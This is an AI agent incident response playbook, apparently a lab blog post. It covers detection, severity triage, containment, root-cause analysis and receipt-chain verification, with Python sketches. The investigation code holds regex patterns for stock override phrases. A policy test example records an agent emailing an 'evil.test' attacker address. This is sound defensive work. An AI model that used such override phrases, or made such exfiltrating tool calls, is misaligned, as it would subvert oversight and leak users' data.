15 Research Lab - Adversarial Safety Evaluation of Frontier AI Systems

John Kearney

AI Agent Incident Response Playbook

February 16, 2026

Tags: agent-safety, compliance, methodology

When an AI agent does something wrong in production, you need a plan. Not a meeting to discuss what to do. A plan that your team can execute immediately.

Phase 1: Detection

Incidents are detected through:

Monitoring alerts: Behavioral anomaly detection (Sentinel) flags unusual patterns
Policy engine logs: Spike in denied actions, unusual tool call patterns
User reports: A user notices the agent behaving incorrectly
Audit trail review: Periodic review discovers past anomalous behavior
External notification: A security researcher or partner reports a vulnerability
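A "spike in denied actions" needs a concrete threshold before it can page anyone. The sketch below is one possible approach, not how Sentinel or any particular policy engine works: it compares the latest per-interval denial count with a baseline of earlier intervals. The function name, the `k` multiplier, and the `min_count` floor are all assumptions to tune against your own traffic.

```python
from statistics import mean, pstdev
from typing import Sequence


def is_denial_spike(history: Sequence[int], current: int,
                    k: float = 3.0, min_count: int = 5) -> bool:
    """Return True when `current` denials clearly exceed the baseline.

    history: denied-action counts for past intervals (e.g. per 5 minutes).
    current: denied-action count for the latest interval.
    k, min_count: hypothetical tuning knobs, not values from any product.
    """
    if len(history) < 2:
        return False  # not enough baseline data to judge
    threshold = mean(history) + k * pstdev(history)
    # min_count avoids alerting on tiny absolute numbers in quiet periods
    return current >= min_count and current > threshold
```

For example, with a baseline of `[1, 2, 1, 0, 2]` denials per interval, a count of 12 is flagged and a count of 3 is not.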

Classify the incident by severity:

P1 (Critical): Active data exfiltration, unauthorized financial transactions, ongoing compromise
P2 (High): Unauthorized tool access detected, policy bypass discovered, potential data exposure
P3 (Medium): Anomalous behavior without confirmed impact, failed attack attempts
P4 (Low): Minor policy violations, single erroneous tool calls, no sensitive data involved
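The severity levels above can be encoded so that triage is consistent across responders. This is a minimal sketch: the signal names in `IncidentSignals` are hypothetical flags derived from the criteria listed above, and you would map them to whatever your detection sources actually report.

```python
from dataclasses import dataclass
from enum import IntEnum


class Severity(IntEnum):
    P1 = 1  # Critical
    P2 = 2  # High
    P3 = 3  # Medium
    P4 = 4  # Low


@dataclass
class IncidentSignals:
    # Hypothetical flags, one per criterion in the severity list.
    active_exfiltration: bool = False
    unauthorized_transaction: bool = False
    ongoing_compromise: bool = False
    unauthorized_tool_access: bool = False
    policy_bypass: bool = False
    potential_data_exposure: bool = False
    anomalous_behavior: bool = False
    failed_attack_attempt: bool = False


def classify(signals: IncidentSignals) -> Severity:
    """Return the most severe level whose criteria match."""
    if (signals.active_exfiltration or signals.unauthorized_transaction
            or signals.ongoing_compromise):
        return Severity.P1
    if (signals.unauthorized_tool_access or signals.policy_bypass
            or signals.potential_data_exposure):
        return Severity.P2
    if signals.anomalous_behavior or signals.failed_attack_attempt:
        return Severity.P3
    # Minor violations and single erroneous tool calls fall through to P4.
    return Severity.P4
```

Checking the most severe criteria first means an incident that matches several levels is always classified at the highest one.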

Phase 2: Containment

For P1/P2 incidents:

Activate the kill switch for the affected agent/session
Revoke the agent's authentication tokens
If data exfiltration is suspected, block the destination endpoints at the network level
Preserve all logs and receipts (ensure no automated cleanup runs)
Notify the incident response team

For P3/P4 incidents:

Increase monitoring sensitivity for the affected agent
Lower policy approval thresholds so that more actions require approval
Flag the session for review
Continue monitoring
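Because containment has to run without a meeting, it helps to have the steps in a form a runbook tool can execute in order. The sketch below only returns the ordered step names from this phase. The step identifiers are illustrative, and wiring each one to a real kill switch, token service, or firewall is left to your environment.

```python
from typing import List

HIGH_SEVERITY = {"P1", "P2"}
LOW_SEVERITY = {"P3", "P4"}


def containment_plan(severity: str,
                     exfiltration_suspected: bool = False) -> List[str]:
    """Return the ordered containment steps for a severity level."""
    if severity in HIGH_SEVERITY:
        steps = ["activate_kill_switch", "revoke_auth_tokens"]
        if exfiltration_suspected:
            # Only needed when data may be leaving the environment.
            steps.append("block_destination_endpoints")
        steps += ["preserve_logs_and_receipts",
                  "notify_incident_response_team"]
        return steps
    if severity in LOW_SEVERITY:
        return ["increase_monitoring_sensitivity",
                "lower_policy_thresholds",
                "flag_session_for_review",
                "continue_monitoring"]
    raise ValueError(f"unknown severity: {severity!r}")
```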

Phase 3: Investigation

Walk the receipt chain from session start to incident:

What was the conversation flow?
When did behavior change?
Was there adversarial input? (check for injection patterns)
Which tool calls were made? Were any denied before the incident?
What data did the agent have access to?
Did monitoring fire alerts before the incident?
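Several of these questions can be answered mechanically once the receipts are loaded. The following sketch assumes a hypothetical `Receipt` record with a sequence number, a kind, and a policy decision; your receipt schema will differ. The two regular expressions are illustrative injection patterns only and are far from a complete scanner.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Illustrative patterns only; a real scanner needs a much broader set.
INJECTION_PATTERNS = [
    re.compile(r"ignore (all )?(previous|prior) instructions", re.IGNORECASE),
    re.compile(r"disregard (the )?system prompt", re.IGNORECASE),
]


@dataclass
class Receipt:
    seq: int                        # position in the session
    kind: str                       # "message" or "tool_call"
    content: str
    tool: Optional[str] = None
    decision: Optional[str] = None  # "allowed" or "denied"


def walk_chain(receipts: List[Receipt], incident_seq: int) -> Dict[str, list]:
    """Summarize the session from its start up to the incident receipt."""
    window = [r for r in sorted(receipts, key=lambda r: r.seq)
              if r.seq <= incident_seq]
    tool_calls = [r for r in window if r.kind == "tool_call"]
    return {
        "tool_calls": [(r.seq, r.tool, r.decision) for r in tool_calls],
        "denied_before_incident": [
            r.seq for r in tool_calls
            if r.decision == "denied" and r.seq < incident_seq],
        "suspected_injection": [
            r.seq for r in window
            if r.kind == "message"
            and any(p.search(r.content) for p in INJECTION_PATTERNS)],
    }
```

The earliest entry in `suspected_injection` is a reasonable first candidate for the point where behavior changed, though it still needs a human read of the conversation.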

Determine root cause:

Prompt injection: Identify the injection vector and payload
Policy gap: Identify the rule that should have blocked the action
Model error: Determine if the model hallucinated or misinterpreted instructions
Configuration error: Check for misdeployed policies or system prompts

Phase 4: Remediation

Based on root cause:

Prompt injection: Add the payload to your scanner patterns. Test for variants. Tighten policy rules around the exploited tool.
Policy gap: Write the missing rule. Test it against the incident scenario. Deploy.
Model error: Review the system prompt for ambiguity. Add explicit constraints. Consider switching models if the errors recur.
Configuration error: Fix the configuration. Add validation to your deployment pipeline.
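For a policy gap, "write the missing rule and test it against the incident scenario" might look like the sketch below. Everything here is hypothetical: the `ToolCall` shape, the `send_email` tool, the `example.com` domain, and the tiny `evaluate` function stand in for whatever policy engine you actually run.

```python
from dataclasses import dataclass, field
from typing import Callable, List, Optional


@dataclass
class ToolCall:
    tool: str
    args: dict = field(default_factory=dict)


# A rule returns a denial reason, or None when it has no objection.
Rule = Callable[[ToolCall], Optional[str]]


def deny_external_email(call: ToolCall) -> Optional[str]:
    """Hypothetical missing rule: block email to outside recipients."""
    if call.tool == "send_email":
        recipient = call.args.get("to", "")
        if not recipient.endswith("@example.com"):
            return "external recipient not allowed"
    return None


def evaluate(call: ToolCall, rules: List[Rule]) -> str:
    """Stand-in policy engine: the first rule that objects wins."""
    for rule in rules:
        reason = rule(call)
        if reason is not None:
            return f"denied: {reason}"
    return "allowed"


# The tool call recorded in the (hypothetical) incident.
incident_call = ToolCall("send_email", {"to": "attacker@evil.test"})
```

Evaluating `incident_call` against the old rule set should return `"allowed"` (reproducing the gap) and against the new set should return a denial. Keep that pair of checks as a regression test.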

Phase 5: Recovery

Verify the fix by replaying the incident scenario against the updated system
Restore the agent with updated policies and scanning rules
Monitor closely for the first 24 hours after restoration
Verify that the receipt chain integrity is intact
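How you verify receipt chain integrity depends on how your receipts are linked, which this playbook does not prescribe. As one common design, the sketch below assumes each receipt stores the hash of its predecessor and a SHA-256 hash over that value plus its own payload. The field names and the all-zero genesis value are assumptions.

```python
import hashlib
import json
from typing import List

GENESIS = "0" * 64  # assumed placeholder hash for the first receipt


def receipt_hash(prev_hash: str, payload: dict) -> str:
    # Canonical JSON so the same payload always hashes the same way.
    body = json.dumps(payload, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode("utf-8")).hexdigest()


def append_receipt(chain: List[dict], payload: dict) -> None:
    prev = chain[-1]["hash"] if chain else GENESIS
    chain.append({"prev_hash": prev, "payload": payload,
                  "hash": receipt_hash(prev, payload)})


def verify_chain(chain: List[dict]) -> int:
    """Return the index of the first broken receipt, or -1 if intact."""
    prev = GENESIS
    for i, receipt in enumerate(chain):
        if (receipt["prev_hash"] != prev
                or receipt["hash"] != receipt_hash(prev, receipt["payload"])):
            return i
        prev = receipt["hash"]
    return -1
```

Under this scheme, editing any receipt's payload after the fact makes `verify_chain` report that receipt's index, because its stored hash no longer matches the recomputed one.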

Phase 6: Post-Incident Review

Within 48 hours, conduct a review covering:

What happened and when
How it was detected and how long detection took
What was the impact
What was the root cause
What remediation was applied
What systemic improvements are needed (process, tooling, training)

Document the review. Add the incident to your red team test corpus. Update your risk register.
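A structured record keeps reviews comparable from one incident to the next and makes detection time a computed number. The sketch below is one possible shape with hypothetical field names. It also assumes the 48-hour window is measured from resolution, which the playbook does not specify.

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import List

REVIEW_DEADLINE = timedelta(hours=48)


@dataclass
class PostIncidentReview:
    started_at: datetime    # when the anomalous behavior began
    detected_at: datetime   # when the incident was first detected
    resolved_at: datetime   # when the agent was restored
    reviewed_at: datetime   # when the review was held
    detection_source: str   # e.g. "monitoring alert", "user report"
    impact: str
    root_cause: str
    remediation: str
    improvements: List[str] = field(default_factory=list)

    @property
    def time_to_detect(self) -> timedelta:
        return self.detected_at - self.started_at

    @property
    def review_on_time(self) -> bool:
        # Assumption: the 48-hour clock starts at resolution.
        return self.reviewed_at - self.resolved_at <= REVIEW_DEADLINE
```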

Keep this playbook accessible to your operations team. Review and update it quarterly.